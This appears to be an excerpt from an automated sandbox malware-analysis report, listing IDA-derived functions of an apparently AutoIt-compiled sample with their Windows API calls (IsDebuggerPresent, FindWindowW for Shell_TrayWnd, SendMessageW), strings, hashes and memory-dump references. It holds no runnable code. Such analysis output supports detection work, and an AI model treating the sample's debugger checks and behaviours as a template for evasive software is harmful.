                                                  • Opcode Fuzzy Hash: f90ab5df88795d5e05dbf97a50a0608493dac53a75575b522372e19ae88c1367
                                                  • Instruction Fuzzy Hash: 92110670505A25BADB388F12CCD8FBBFBA8FF06361F10822AF52456000D2705A91D6F0
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C4AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C4AABC
                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C48E73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 8e36481d165b9a0ddeb8091fd078dd1bfb311ffaa67f6230714dc9182b62ea57
                                                  • Instruction ID: 7dfd2eb6d59473109683f9215b6d397ac445751ae3ca73d89c2f8d915c5f6e76
                                                  • Opcode Fuzzy Hash: 8e36481d165b9a0ddeb8091fd078dd1bfb311ffaa67f6230714dc9182b62ea57
                                                  • Instruction Fuzzy Hash: AF0124B5641219ABCB14EBA4CC419FE73ACFF02320B400A69F931672E1DE31580CD660
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C4AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C4AABC
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C48D6B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 27717d8214c75cf1e1bf933c54ce40a80b8b476658aa3710a45d0977dede3cad
                                                  • Instruction ID: 8f2131271e35d2159ef90454057509a375178f71a17a84611f2b451ddc534988
                                                  • Opcode Fuzzy Hash: 27717d8214c75cf1e1bf933c54ce40a80b8b476658aa3710a45d0977dede3cad
                                                  • Instruction Fuzzy Hash: 8901D4B5A4110EABCF14EBA0CD52AFE73ACAF15300F100069B905672D1DE245E0CE671
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C4AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C4AABC
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C48DEE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: 1edc5475976869a6e87555b454b2497b45109168d0497f771fe893eed821b6fd
                                                  • Instruction ID: 44c3bc88c98fa9f63a44a19b62a7c7b11b615b0863543606d0e36f863ff09634
                                                  • Opcode Fuzzy Hash: 1edc5475976869a6e87555b454b2497b45109168d0497f771fe893eed821b6fd
                                                  • Instruction Fuzzy Hash: 4701A2B1A8210AABDB25EBA4CD42AFE77ACAF11700F104465B906732D2DE254E0CE671
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp
                                                  • String ID: #32770
                                                  • API String ID: 2292705959-463685578
                                                  • Opcode ID: dd7e9354fa4bc7067685a26ed337c517454d1003122e60a0defb049ea4beee2a
                                                  • Instruction ID: 99ae0193248c35592e6670634e2e2ddfb8122ad8fb05aea2f8b8c0da1ed3b814
                                                  • Opcode Fuzzy Hash: dd7e9354fa4bc7067685a26ed337c517454d1003122e60a0defb049ea4beee2a
                                                  • Instruction Fuzzy Hash: A2E09B3250022927D72096999C49BA7F7ACEB45B65F000166FD14D2051D5609A9587D0
                                                  APIs
                                                    • Part of subcall function 00C2B314: _memset.LIBCMT ref: 00C2B321
                                                    • Part of subcall function 00C10940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C2B2F0,?,?,?,00BF100A), ref: 00C10945
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00BF100A), ref: 00C2B2F4
                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BF100A), ref: 00C2B303
                                                  Strings
                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C2B2FE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                  • API String ID: 3158253471-631824599
                                                  • Opcode ID: aaf68f7106a6792a74bb6cecb277c28bc6c31b62e2859919e30013c6a005c0a0
                                                  • Instruction ID: 9de7cc8e2df001d6c0e2f2d3453ff252357e47a269259df5de8ca6116d8953a5
                                                  • Opcode Fuzzy Hash: aaf68f7106a6792a74bb6cecb277c28bc6c31b62e2859919e30013c6a005c0a0
                                                  • Instruction Fuzzy Hash: 19E092B02107108FDB20DF28E9483467BE4BF00314F008A7CE49AC7662EFB4D888CBA1
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C47C82
                                                    • Part of subcall function 00C13358: _doexit.LIBCMT ref: 00C13362
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Message_doexit
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 1993061046-4017498283
                                                  • Opcode ID: 57769de17685174815c99b6afd135bad56d419859f9ec8c09cd3764635af548e
                                                  • Instruction ID: a7e96891dd303a886489a842b20052249446eaa39328aa20fb8a2e9ab92d078a
                                                  • Opcode Fuzzy Hash: 57769de17685174815c99b6afd135bad56d419859f9ec8c09cd3764635af548e
                                                  • Instruction Fuzzy Hash: 53D0C23238432832D20132A56C06BDA29884F02B56F140025BF08990D34AD149C162A8
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00C31775
                                                    • Part of subcall function 00C6BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00C3195E,?), ref: 00C6BFFE
                                                    • Part of subcall function 00C6BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6C010
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C3196D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                  • String ID: WIN_XPe
                                                  • API String ID: 582185067-3257408948
                                                  • Opcode ID: a6d385ec69b82b553c361a4e6870f4baef6210bc7ee54a591e936f6650eac857
                                                  • Instruction ID: 81440ffc3b4c9138331ff521a424880e756971a883ed6d5cacc23e04e07ef3ae
                                                  • Opcode Fuzzy Hash: a6d385ec69b82b553c361a4e6870f4baef6210bc7ee54a591e936f6650eac857
                                                  • Instruction Fuzzy Hash: 8CF0A570814109DFDB15DB91C9C8BECBBF8AB09301F580095E516A61A0D7758F85DF61
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C759AE
                                                  • PostMessageW.USER32(00000000), ref: 00C759B5
                                                    • Part of subcall function 00C55244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C552BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: 1432fab1bee9cffdb2a0873ad44fdd2d16774ca4034745512ec3ec22e4cd18d9
                                                  • Instruction ID: 235bafb16d86b559dfbc883d6689d648879cd3e61de9fe67ed00490c3e701282
                                                  • Opcode Fuzzy Hash: 1432fab1bee9cffdb2a0873ad44fdd2d16774ca4034745512ec3ec22e4cd18d9
                                                  • Instruction Fuzzy Hash: 75D0C931784311BBE7A4BB709C4BF9A6A14BB05B51F000839B649AA1D0D9E0A845C758
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C7596E
                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C75981
                                                    • Part of subcall function 00C55244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C552BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: 301b0d48ea2e924cf9b414fcde007e13b40137fc9fa6d7d6e5ad3d994111680c
                                                  • Instruction ID: 4f705d9df29c3b3f1aaeb19abe42952c21adacf0e98ba26bb706e57dcde4b1a8
                                                  • Opcode Fuzzy Hash: 301b0d48ea2e924cf9b414fcde007e13b40137fc9fa6d7d6e5ad3d994111680c
                                                  • Instruction Fuzzy Hash: 0FD0C935784311B7E7A4BB709C5BF9A6A14BB00B51F000839B649AA1D0D9E09845C754